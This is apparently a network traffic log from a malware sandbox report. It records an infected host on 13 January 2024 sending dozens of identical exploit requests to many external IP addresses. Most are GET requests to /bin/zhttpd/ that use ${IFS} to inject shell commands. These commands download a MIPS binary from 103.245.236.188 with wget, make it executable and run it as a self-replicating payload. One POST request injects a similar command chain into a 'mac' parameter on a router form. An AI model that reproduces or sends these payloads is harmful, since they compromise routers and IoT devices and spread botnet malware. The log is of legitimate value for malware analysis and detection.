                                    Jan 13, 2024 19:02:51.595695019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8888192.168.2.1339104189.61.77.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595736027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8889192.168.2.1343008195.205.222.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595786095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8890192.168.2.1360950190.147.185.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595890045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8891192.168.2.135659485.1.143.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595953941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8892192.168.2.135190264.148.219.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596004009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8893192.168.2.1359326149.93.139.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596070051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8894192.168.2.134377268.44.119.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596121073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8895192.168.2.1350488116.159.157.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596174955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8896192.168.2.1334330167.163.20.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596234083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8897192.168.2.133941273.185.198.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596281052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8898192.168.2.1355620216.94.240.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596316099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8899192.168.2.1342536105.165.48.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596369028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8900192.168.2.1358918155.16.170.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596446037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8901192.168.2.1337680121.220.208.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596504927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8902192.168.2.1353664162.95.39.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596560955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8903192.168.2.134363231.215.170.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596621990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8904192.168.2.134688064.57.19.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596688986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8905192.168.2.135872650.229.2.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596729994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8906192.168.2.1340414179.192.0.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596795082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8907192.168.2.133668882.229.216.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596852064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8908192.168.2.1355836160.244.111.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596887112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8909192.168.2.1339376182.31.9.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.596947908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8910192.168.2.135328438.87.96.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.597023964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8911192.168.2.133925666.85.175.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.597081900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8912192.168.2.135380653.245.87.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.597142935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8913192.168.2.1359538103.180.180.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.597217083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8914192.168.2.1332832135.132.173.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.601885080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8915192.168.2.133862870.55.237.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.601923943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8916192.168.2.1339364180.243.86.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.601980925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8917192.168.2.1351110218.255.209.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.602008104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8918192.168.2.135532025.204.53.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.602082014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8919192.168.2.1347992129.159.228.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.602112055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8920192.168.2.1346004157.10.40.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.602152109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8921192.168.2.1360344137.33.10.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.602200031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8922192.168.2.1338634159.81.207.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.602284908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8923192.168.2.1343314119.218.122.1668080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.194437027 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8924192.168.2.1347666173.165.157.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.601646900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8925192.168.2.1348942104.102.119.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.601720095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8926192.168.2.134167091.245.19.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.601897001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8927192.168.2.1344880201.175.26.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.601941109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8928192.168.2.135017663.43.19.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602000952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8929192.168.2.1359362178.179.234.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602092981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8930192.168.2.1355430203.8.103.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602096081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8931192.168.2.13371581.124.121.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602153063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8932192.168.2.134725414.158.33.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602190971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8933192.168.2.133791683.145.75.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602256060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8934192.168.2.135737284.114.45.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602300882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8935192.168.2.1360650120.179.175.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602368116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8936192.168.2.1360556204.140.236.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602401972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8937192.168.2.1358046156.243.35.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602453947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8938192.168.2.1350660102.163.15.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602518082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8939192.168.2.1346640182.207.132.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602575064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8940192.168.2.1343174192.171.182.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602624893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8941192.168.2.13547944.224.73.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602695942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8942192.168.2.1334816155.1.29.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602735043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8943192.168.2.1344112149.74.181.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602785110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8944192.168.2.1351248175.0.235.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602860928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8945192.168.2.1355532221.168.226.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602900982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8946192.168.2.134888850.111.17.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602947950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8947192.168.2.133341261.72.254.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.602993011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8948192.168.2.1333142150.29.161.254443
                                    TimestampBytes transferredDirectionData
